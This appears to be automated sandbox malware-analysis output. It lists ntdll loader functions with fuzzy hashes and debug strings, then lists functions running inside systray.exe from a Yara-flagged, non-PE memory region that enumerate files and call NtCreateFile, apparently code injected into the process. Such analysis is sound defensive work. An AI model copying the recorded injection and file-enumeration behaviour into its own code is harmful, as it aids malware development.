Associated: 00000003.00000002.33058899963.000000001EA8D000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
API String ID: 3446177414-1745908468
Opcode ID: e9d20afde23da7927879c116cf6f590ec15a5862d618c6784fc2b680bd65f5f0
Instruction ID: a047a3bff44782ec96a234c6eb5eed5238c0b77ab8c9b33a98c133272a5f569c
Opcode Fuzzy Hash: e9d20afde23da7927879c116cf6f590ec15a5862d618c6784fc2b680bd65f5f0
Instruction Fuzzy Hash: 4C910039910685DFCB02CFA8C440ADDFBF6FF89311F24864DE491AB261C736A981CB18

Uniqueness

Uniqueness Score: -1.00%

Function 1E98640D, Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E98651C

Part of subcall function 1E986565: RtlDebugPrintTimes.NTDLL ref: 1E986614
Part of subcall function 1E986565: RtlDebugPrintTimes.NTDLL ref: 1E98665F

Strings

Getting the shim engine exports failed with status 0x%08lx, xrefs: 1E9E9790
Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 1E9E977C
minkernel\ntdll\ldrinit.c, xrefs: 1E9E97A0, 1E9E97C9
apphelp.dll, xrefs: 1E986446
Loading the shim engine DLL failed with status 0x%08lx, xrefs: 1E9E97B9
LdrpInitShimEngine, xrefs: 1E9E9783, 1E9E9796, 1E9E97BF

Memory Dump Source

Source File: 00000003.00000002.33057738260.000000001E960000.00000040.00000001.sdmp, Offset: 1E960000, based on PE: true

Associated: 00000003.00000002.33058865250.000000001EA89000.00000040.00000001.sdmp Download File
Associated: 00000003.00000002.33058899963.000000001EA8D000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-204845295
Opcode ID: 15c39a1523258c42135cc1bcbbeb0dc41e13d0bf6a9423afa660f6394f0c5740
Instruction ID: 2054ef9bb7add33d328b2c3e743dfdb39978007fb728cceecf500f24af60a298
Opcode Fuzzy Hash: 15c39a1523258c42135cc1bcbbeb0dc41e13d0bf6a9423afa660f6394f0c5740
Instruction Fuzzy Hash: 90518EB56083449FD212CF24C891F9B77E9EFC4644F044A5EFA859B661EB30E909CF92

Uniqueness

Uniqueness Score: -1.00%

Function 1EA0FA02, Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1EA0FAF3
RtlDebugPrintTimes.NTDLL ref: 1EA0FB15

Strings

Unknown, xrefs: 1EA0FA42, 1EA0FA54
minkernel\ntdll\ldrdload.c, xrefs: 1EA0FA68
Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx, xrefs: 1EA0FA58
$, xrefs: 1EA0FABD
LdrpRedirectDelayloadFailure, xrefs: 1EA0FA5E

Memory Dump Source

Source File: 00000003.00000002.33057738260.000000001E960000.00000040.00000001.sdmp, Offset: 1E960000, based on PE: true

Associated: 00000003.00000002.33058865250.000000001EA89000.00000040.00000001.sdmp Download File
Associated: 00000003.00000002.33058899963.000000001EA8D000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
API String ID: 3446177414-4227709934
Opcode ID: 268b3687f57cfc5b048ad72df5f5b2df651cbd39dd30540b9da3e74859a780ae
Instruction ID: a79bad2846624df817a93d125e95224e64d2a53d0e8dd686d7128202f87652f9
Opcode Fuzzy Hash: 268b3687f57cfc5b048ad72df5f5b2df651cbd39dd30540b9da3e74859a780ae
Instruction Fuzzy Hash: B0417CB9A00209AFCB01CF99D890ADEBBBABF88304F144259E944B7300D731AD41CF94

Uniqueness

Uniqueness Score: -1.00%

Function 1E986565, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E986614
RtlDebugPrintTimes.NTDLL ref: 1E98665F

Strings

Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 1E9E9885
LdrpLoadShimEngine, xrefs: 1E9E984A, 1E9E988B
minkernel\ntdll\ldrinit.c, xrefs: 1E9E9854, 1E9E9895
Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 1E9E9843

Memory Dump Source

Source File: 00000003.00000002.33057738260.000000001E960000.00000040.00000001.sdmp, Offset: 1E960000, based on PE: true

Associated: 00000003.00000002.33058865250.000000001EA89000.00000040.00000001.sdmp Download File
Associated: 00000003.00000002.33058899963.000000001EA8D000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-3589223738
Opcode ID: e718c4a13f16d7623f9e6dfb0f0ec7203ff2e551db335ac91ee43ef3f7b9ecad
Instruction ID: 5e5737730c15dc436b2a42e17f58884469fe941747d731755ea8dd7122a8d77e
Opcode Fuzzy Hash: e718c4a13f16d7623f9e6dfb0f0ec7203ff2e551db335ac91ee43ef3f7b9ecad
Instruction Fuzzy Hash: 4651D475A102A89BDB06DBA8CC94EDD77B6BB84314F04076DE541BF2A6DB70AC45CF80

Uniqueness

Uniqueness Score: -1.00%

Function 1EA3ECD7, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1EA3EDD0
RtlDebugPrintTimes.NTDLL ref: 1EA3EE45

Strings

---------------------------------------, xrefs: 1EA3EDF9
Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 1EA3EDE3
Entry Heap Size , xrefs: 1EA3EDED
HEAP: , xrefs: 1EA3ECDD

Memory Dump Source

Source File: 00000003.00000002.33057738260.000000001E960000.00000040.00000001.sdmp, Offset: 1E960000, based on PE: true

Associated: 00000003.00000002.33058865250.000000001EA89000.00000040.00000001.sdmp Download File
Associated: 00000003.00000002.33058899963.000000001EA8D000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
API String ID: 3446177414-1102453626
Opcode ID: 4d0275e37222cc5524cc866dbc5676aee14b87da2fa708573063630816ab22ab
Instruction ID: 3c547ff021167a9b5117f86b3b54c8dfe1582d15432e8ecec146d96384c9d93d
Opcode Fuzzy Hash: 4d0275e37222cc5524cc866dbc5676aee14b87da2fa708573063630816ab22ab
Instruction Fuzzy Hash: 5A419A35A00326DFC701DF19C484D5ABBE6EF85656735C6AEE549AF220D731EC02CB84

Uniqueness

Uniqueness Score: -1.00%

Function 1E999046, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E9F2360

Strings

$, xrefs: 1E9990B1
@, xrefs: 1E999095

Memory Dump Source

Source File: 00000003.00000002.33057738260.000000001E960000.00000040.00000001.sdmp, Offset: 1E960000, based on PE: true

Associated: 00000003.00000002.33058865250.000000001EA89000.00000040.00000001.sdmp Download File
Associated: 00000003.00000002.33058899963.000000001EA8D000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: $$@
API String ID: 3446177414-1194432280
Opcode ID: 3f01fe2e0eaded17b733fbf81befac55fd8a933c5ba1f2e7508b39ec96a12dd7
Instruction ID: ab1fc606d3aeb8228d085bb46d4db10e2437c9a7926afda54576b67ad93c064b
Opcode Fuzzy Hash: 3f01fe2e0eaded17b733fbf81befac55fd8a933c5ba1f2e7508b39ec96a12dd7
Instruction Fuzzy Hash: 48813AB5D00269DBDB22CF54CC44BDEB6B8AF48710F0446EAE919B7240E7709E85DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 1E9C4C3D, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E9C4C84

Strings

Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 1EA03439
LdrpFindDllActivationContext, xrefs: 1EA03440, 1EA0346C
minkernel\ntdll\ldrsnap.c, xrefs: 1EA0344A, 1EA03476
Querying the active activation context failed with status 0x%08lx, xrefs: 1EA03466

Memory Dump Source

Source File: 00000003.00000002.33057738260.000000001E960000.00000040.00000001.sdmp, Offset: 1E960000, based on PE: true

Associated: 00000003.00000002.33058865250.000000001EA89000.00000040.00000001.sdmp Download File
Associated: 00000003.00000002.33058899963.000000001EA8D000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 3446177414-3779518884
Opcode ID: dd3b879866702e07963c66bdfe6d26d0bc584347635cab260a92727444566aaf
Instruction ID: 1fe6dd1d53e4fdcfb4b3b6655775ba2c46a3d7403f7ac2902fde0e1b94698e0e
Opcode Fuzzy Hash: dd3b879866702e07963c66bdfe6d26d0bc584347635cab260a92727444566aaf
Instruction Fuzzy Hash: A7312B72F80292AFDB13FF09C895ED672A9BB41754F02C32ED8006B170D7609C908E93

Uniqueness

Uniqueness Score: -1.00%

Function 1E9B237A, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 1E9FA79F
LdrpDynamicShimModule, xrefs: 1E9FA7A5
minkernel\ntdll\ldrinit.c, xrefs: 1E9FA7AF
apphelp.dll, xrefs: 1E9B2382

Memory Dump Source

Source File: 00000003.00000002.33057738260.000000001E960000.00000040.00000001.sdmp, Offset: 1E960000, based on PE: true

Associated: 00000003.00000002.33058865250.000000001EA89000.00000040.00000001.sdmp Download File
Associated: 00000003.00000002.33058899963.000000001EA8D000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: 7d20438d5a4b8bca7e3ccbfe4324cca644fe88ab5617ee56528b6c706e6167d4
Instruction ID: 96ff7a875b63d667e4270065e19bb2ed0277bcad7d83bde426e1d7f8aafb043d
Opcode Fuzzy Hash: 7d20438d5a4b8bca7e3ccbfe4324cca644fe88ab5617ee56528b6c706e6167d4
Instruction Fuzzy Hash: 5331F375E10251EFE7169F59C8C0E9E7BB9EBC4B10F14065DE8016B250E7B8A842CF90

Uniqueness

Uniqueness Score: -1.00%

Function 1E9B0AEB, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E9B0BFC

Strings

minkernel\ntdll\ldrinit.c, xrefs: 1E9F9F2E
LdrpCheckModule, xrefs: 1E9F9F24
Failed to allocated memory for shimmed module list, xrefs: 1E9F9F1C

Memory Dump Source

Source File: 00000003.00000002.33057738260.000000001E960000.00000040.00000001.sdmp, Offset: 1E960000, based on PE: true

Associated: 00000003.00000002.33058865250.000000001EA89000.00000040.00000001.sdmp Download File
Associated: 00000003.00000002.33058899963.000000001EA8D000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-161242083
Opcode ID: 8127a82d6460ae4956fd670111d9505ff6338f4b447002caa263814d6cb0869b
Instruction ID: 1d825605d32b9ea2861b2494cf357b5bf91d8d4c026f4cf81ae61c5e7c4822fd
Opcode Fuzzy Hash: 8127a82d6460ae4956fd670111d9505ff6338f4b447002caa263814d6cb0869b
Instruction Fuzzy Hash: 0E71C274A00255DFDB06DFA8C8A0EAEBBF5FB84708F14466DD805AB254E734AD42CF50

Uniqueness

Uniqueness Score: -1.00%

Function 1E9CC640, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E9CC6DF

Strings

Failed to reallocate the system dirs string !, xrefs: 1EA080E2
minkernel\ntdll\ldrinit.c, xrefs: 1EA080F3
LdrpInitializePerUserWindowsDirectory, xrefs: 1EA080E9

Memory Dump Source

Source File: 00000003.00000002.33057738260.000000001E960000.00000040.00000001.sdmp, Offset: 1E960000, based on PE: true

Associated: 00000003.00000002.33058865250.000000001EA89000.00000040.00000001.sdmp Download File
Associated: 00000003.00000002.33058899963.000000001EA8D000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-1783798831
Opcode ID: 1b6bd9930939ba91cadadf51e001741942d9acc3403a2c42b619c79bf4e4e62a
Instruction ID: 2d40add8c3b71beec44b959bb85e0622bb2e85eac84121f5dd8c19e3a390daa1
Opcode Fuzzy Hash: 1b6bd9930939ba91cadadf51e001741942d9acc3403a2c42b619c79bf4e4e62a
Instruction Fuzzy Hash: 7B41C8B5914391ABC715EB68DE44F5B7BE9AF84711F004A2DF948AB250E730E801CF96

Uniqueness

Uniqueness Score: -1.00%

Function 1EA143D5, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1EA14489

Strings

minkernel\ntdll\ldrredirect.c, xrefs: 1EA14519
LdrpCheckRedirection, xrefs: 1EA1450F
Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 1EA14508

Memory Dump Source

Source File: 00000003.00000002.33057738260.000000001E960000.00000040.00000001.sdmp, Offset: 1E960000, based on PE: true

Associated: 00000003.00000002.33058865250.000000001EA89000.00000040.00000001.sdmp Download File
Associated: 00000003.00000002.33058899963.000000001EA8D000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 3446177414-3154609507
Opcode ID: 62a0d1748a8e2004923827321921a75d4ad87187b4b0fe4a0022b1c71e9f5fd9
Instruction ID: 8eab789357d2fab3cc196024be0e61540591dcd7c3df7758027412b0238151f9
Opcode Fuzzy Hash: 62a0d1748a8e2004923827321921a75d4ad87187b4b0fe4a0022b1c71e9f5fd9
Instruction Fuzzy Hash: AD41DE726086219BCB11CF6DC940A5677EBAF88660F06076AEC88AF355D730EC008B89

Uniqueness

Uniqueness Score: -1.00%

Function 1EA15B90, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1EA15C0F
RtlDebugPrintTimes.NTDLL ref: 1EA15C31
RtlDebugPrintTimes.NTDLL ref: 1EA15C3E

Strings

Wow64 Emulation Layer, xrefs: 1EA15C09

Memory Dump Source

Source File: 00000003.00000002.33057738260.000000001E960000.00000040.00000001.sdmp, Offset: 1E960000, based on PE: true

Associated: 00000003.00000002.33058865250.000000001EA89000.00000040.00000001.sdmp Download File
Associated: 00000003.00000002.33058899963.000000001EA8D000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: Wow64 Emulation Layer
API String ID: 3446177414-921169906
Opcode ID: d4f3dd1538bfa019f6a0b70c85a8f8e4183b1620e8635e6c6a5aa351f05c7a22
Instruction ID: f07efcb0513fe4da36e0c1a82f6ef38fffb867c2d061f1a28088fa9e7ad71677
Opcode Fuzzy Hash: d4f3dd1538bfa019f6a0b70c85a8f8e4183b1620e8635e6c6a5aa351f05c7a22
Instruction Fuzzy Hash: 39212CB550015DBFAB019BA1CD84DFF7B7DEF84699B040659FA05A6140E730AE01DB64

Uniqueness

Uniqueness Score: -1.00%

Function 1E9BEE48, Relevance: 6.3, APIs: 4, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.33057738260.000000001E960000.00000040.00000001.sdmp, Offset: 1E960000, based on PE: true

Associated: 00000003.00000002.33058865250.000000001EA89000.00000040.00000001.sdmp Download File
Associated: 00000003.00000002.33058899963.000000001EA8D000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd75e935d31ed22b488aec530d1fc9f4c367d9da7d21953a43ed225f65ad1fdb
Instruction ID: ea648999f5151a9556745604899b2e1f21937cc5561d5447f11dc75369355b3e
Opcode Fuzzy Hash: dd75e935d31ed22b488aec530d1fc9f4c367d9da7d21953a43ed225f65ad1fdb
Instruction Fuzzy Hash: F0E10275D00649DFCB26CFA9C980A9DBBF9FF48300F104A6EE546A7624D771A981CF50

Uniqueness

Uniqueness Score: -1.00%

Function 1EA0EBD0, Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1EA0EC61
RtlDebugPrintTimes.NTDLL ref: 1EA0EC89
RtlDebugPrintTimes.NTDLL ref: 1EA0ED2C
RtlDebugPrintTimes.NTDLL ref: 1EA0EDE0

Memory Dump Source

Source File: 00000003.00000002.33057738260.000000001E960000.00000040.00000001.sdmp, Offset: 1E960000, based on PE: true

Associated: 00000003.00000002.33058865250.000000001EA89000.00000040.00000001.sdmp Download File
Associated: 00000003.00000002.33058899963.000000001EA8D000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 8ab624a5295832f227fa99ae961b72b2ce71e58a354330cbd804e10d21fd4efa
Instruction ID: 86bf37dba5c6a0b5b60fe0790c6b69171c70b8ff1b392f56451923de6fb906d9
Opcode Fuzzy Hash: 8ab624a5295832f227fa99ae961b72b2ce71e58a354330cbd804e10d21fd4efa
Instruction Fuzzy Hash: F7713375E002299FDF05CFA9E984BDDBBB5FF48314F14812AEA05BB244D735A901CB98

Uniqueness

Uniqueness Score: -1.00%

Function 1EA6A04A, Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1EA6A0F7
RtlDebugPrintTimes.NTDLL ref: 1EA6A1AA
RtlDebugPrintTimes.NTDLL ref: 1EA6A1CE
RtlDebugPrintTimes.NTDLL ref: 1EA6A1E3

Memory Dump Source

Source File: 00000003.00000002.33057738260.000000001E960000.00000040.00000001.sdmp, Offset: 1E960000, based on PE: true

Associated: 00000003.00000002.33058865250.000000001EA89000.00000040.00000001.sdmp Download File
Associated: 00000003.00000002.33058899963.000000001EA8D000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 9def25c1c2049410a55afc73e8453af15937d45e7a7d3c5f73016340b176b24e
Instruction ID: 0ffebf22af089203238a263da400aa82c24538cc00846ce2e5ddeac8abfd4500
Opcode Fuzzy Hash: 9def25c1c2049410a55afc73e8453af15937d45e7a7d3c5f73016340b176b24e
Instruction Fuzzy Hash: DD515A35714A129FDB08CE1AC8B0A19B7F2FB8E310B26466DD90ADB715DB71EC41CB84

Uniqueness

Uniqueness Score: -1.00%

Function 1EA0EE56, Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1EA0EEED
RtlDebugPrintTimes.NTDLL ref: 1EA0EF12
RtlDebugPrintTimes.NTDLL ref: 1EA0EFA4
RtlDebugPrintTimes.NTDLL ref: 1EA0EFF8

Memory Dump Source

Source File: 00000003.00000002.33057738260.000000001E960000.00000040.00000001.sdmp, Offset: 1E960000, based on PE: true

Associated: 00000003.00000002.33058865250.000000001EA89000.00000040.00000001.sdmp Download File
Associated: 00000003.00000002.33058899963.000000001EA8D000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 18ee719e0ea250b20e3827e527d0dfa1c3454c13e7361790d76731e91d706b42
Instruction ID: ddff932b23dedff2bc70febd4636cb621ffa4fd2effdadab3943e0a9f068e5fc
Opcode Fuzzy Hash: 18ee719e0ea250b20e3827e527d0dfa1c3454c13e7361790d76731e91d706b42
Instruction Fuzzy Hash: 625137B5E112189FDF04CF99E840ADDBBF6BF48314F15822AE906BB250E735A941CF58

Uniqueness

Uniqueness Score: -1.00%

Function 1E9C7A4F, Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E9C7A72
BaseThreadInitThunk.KERNEL32 ref: 1E9C7A7C
RtlDebugPrintTimes.NTDLL ref: 1EA047F8
RtlDebugPrintTimes.NTDLL ref: 1EA0487B

Memory Dump Source

Source File: 00000003.00000002.33057738260.000000001E960000.00000040.00000001.sdmp, Offset: 1E960000, based on PE: true

Associated: 00000003.00000002.33058865250.000000001EA89000.00000040.00000001.sdmp Download File
Associated: 00000003.00000002.33058899963.000000001EA8D000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes$BaseInitThreadThunk
String ID:
API String ID: 4281723722-0
Opcode ID: 92dc306f54fe56a4ecd29c16719b13ec3d3ccfceb1464cd29833db4d683ff670
Instruction ID: 5dd00eb8c45f685c533f70e0c731b2446b938c48e8d65073fd885190da886191
Opcode Fuzzy Hash: 92dc306f54fe56a4ecd29c16719b13ec3d3ccfceb1464cd29833db4d683ff670
Instruction Fuzzy Hash: 8E312475E00268AFCF06DFA8D894A9DBBB1BB88721F14462AE911BB380D7355901CF54

Uniqueness

Uniqueness Score: -1.00%

Function 1E9C4B79, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON

Download Yara Rule

Strings

Flst, xrefs: 1E9C4BB6
0, xrefs: 1E9C4BE3

Memory Dump Source

Source File: 00000003.00000002.33057738260.000000001E960000.00000040.00000001.sdmp, Offset: 1E960000, based on PE: true

Associated: 00000003.00000002.33058865250.000000001EA89000.00000040.00000001.sdmp Download File
Associated: 00000003.00000002.33058899963.000000001EA8D000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: 0$Flst
API String ID: 0-758220159
Opcode ID: 698196ab3ba90ce1a491ab22b22ef0a110b3e7664c4bd9f100c093388841440a
Instruction ID: 8a5147b6fb4e42c9ad14da1603219ff691f1ca26be4470a2fc87d4df24dbafe0
Opcode Fuzzy Hash: 698196ab3ba90ce1a491ab22b22ef0a110b3e7664c4bd9f100c093388841440a
Instruction Fuzzy Hash: 035199B1F102898FDB22DF95C48069EFBFAEF44715F14862ED0459B254E7709985CF81

Uniqueness

Uniqueness Score: -1.00%

Function 1E990485, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E9905D6

Strings

kLsE, xrefs: 1E9905FE
TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 1E990586

Memory Dump Source

Source File: 00000003.00000002.33057738260.000000001E960000.00000040.00000001.sdmp, Offset: 1E960000, based on PE: true

Associated: 00000003.00000002.33058865250.000000001EA89000.00000040.00000001.sdmp Download File
Associated: 00000003.00000002.33058899963.000000001EA8D000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 3446177414-2547482624
Opcode ID: bbd3bef8f7196430bad10c901b513a895a50786fc86a972dd348feeddf7f43b2
Instruction ID: 98f3a6daf99134e58beefab5b98e732e0a67892b5784d26d9391046ed17a64e7
Opcode Fuzzy Hash: bbd3bef8f7196430bad10c901b513a895a50786fc86a972dd348feeddf7f43b2
Instruction Fuzzy Hash: 4D51CF71A1078ADFDB11DFA6C4406AEB7F9AF44300F008A3ED6A997640E730A545DF62

Uniqueness

Uniqueness Score: -1.00%

Function 1E98DF21, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E98DFE0

Strings

0, xrefs: 1E98DFC0
0, xrefs: 1E98DFAB

Memory Dump Source

Source File: 00000003.00000002.33057738260.000000001E960000.00000040.00000001.sdmp, Offset: 1E960000, based on PE: true

Associated: 00000003.00000002.33058865250.000000001EA89000.00000040.00000001.sdmp Download File
Associated: 00000003.00000002.33058899963.000000001EA8D000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: 0$0
API String ID: 3446177414-203156872
Opcode ID: 2d67b9256b2336bfd3ab2a69a460dc7d72e965f0615a1325a84e6c30f28c78b8
Instruction ID: abe663fd30df4166facd789e515e7ad9b4709f2187fd9aabb2888b3e0159d3f1
Opcode Fuzzy Hash: 2d67b9256b2336bfd3ab2a69a460dc7d72e965f0615a1325a84e6c30f28c78b8
Instruction Fuzzy Hash: 96416CB16187469FC301CF28C544A4ABBE9BB88718F044A6EF588DB310D771EA45CF96

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: systray.exe PID: 2092 Parent PID: 680 systray.exeCOMMON

Executed Functions

Function 027DFA79, Relevance: 4.6, APIs: 3, Instructions: 103fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,00000000), ref: 027DFB4F
FindNextFileW.KERNELBASE(?,00000010), ref: 027DFB8E
FindClose.KERNEL32(?), ref: 027DFB99

Memory Dump Source

Source File: 0000000D.00000002.37528295705.00000000027D0000.00000040.00020000.sdmp, Offset: 027D0000, based on PE: false

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: ae9b4125249194b310dfdd7cfb0a51d5ce91109f518722434f5d8c869dbbbbd7
Instruction ID: 70860c494c8688f85c01470955106b6fdfe46a6c0a64c302fc801cade87d7bf5
Opcode Fuzzy Hash: ae9b4125249194b310dfdd7cfb0a51d5ce91109f518722434f5d8c869dbbbbd7
Instruction Fuzzy Hash: EC318371900249ABDF21DF64CC85FFB7779AF84704F14449DF906A7180D7B0AA84CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 027DFA80, Relevance: 4.6, APIs: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,00000000), ref: 027DFB4F
FindNextFileW.KERNELBASE(?,00000010), ref: 027DFB8E
FindClose.KERNEL32(?), ref: 027DFB99

Memory Dump Source

Source File: 0000000D.00000002.37528295705.00000000027D0000.00000040.00020000.sdmp, Offset: 027D0000, based on PE: false

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 10afa65eabfac5dc8a7cf02fe1f6fc9e56939f8d9d3910f253c85e0273943ff6
Instruction ID: 62ed424497b52584a9b71e5fdcd153235f016956f5b4cc8a48407b7167dbc3c8
Opcode Fuzzy Hash: 10afa65eabfac5dc8a7cf02fe1f6fc9e56939f8d9d3910f253c85e0273943ff6
Instruction Fuzzy Hash: 73314171900209ABDB21DB64CC85FFB7779AB84704F144599F94AA7180D770AA848BA1

Uniqueness

Uniqueness Score: -1.00%

Function 027E85B0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,027E3BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,027E3BA7,007A002E,00000000,00000060,00000000,00000000), ref: 027E85FD

Strings

.z`, xrefs: 027E85ED, 027E85F8

Memory Dump Source

Source File: 0000000D.00000002.37528295705.00000000027D0000.00000040.00020000.sdmp, Offset: 027D0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 63a35c79c17d1e955ff0f9bf95e5e624b35d8e928d46766857d289155f687fc4
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: B2F0B2B2200208ABCB08CF88DC84EEB77ADAF8C754F158248BA0D97240D630E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 027E85AA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 38filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,027E3BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,027E3BA7,007A002E,00000000,00000060,00000000,00000000), ref: 027E85FD

Strings

.z`, xrefs: 027E85ED, 027E85F8

Memory Dump Source

Source File: 0000000D.00000002.37528295705.00000000027D0000.00000040.00020000.sdmp, Offset: 027D0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: bc79ae710039e542b7974568ad528caaf0be6a2939ff77cc5d7f1d8d64c0953e
Instruction ID: fa2a4a4c361dac0a99e88d543448a35de532e630b59e96f5e430f425e694c0f8
Opcode Fuzzy Hash: bc79ae710039e542b7974568ad528caaf0be6a2939ff77cc5d7f1d8d64c0953e
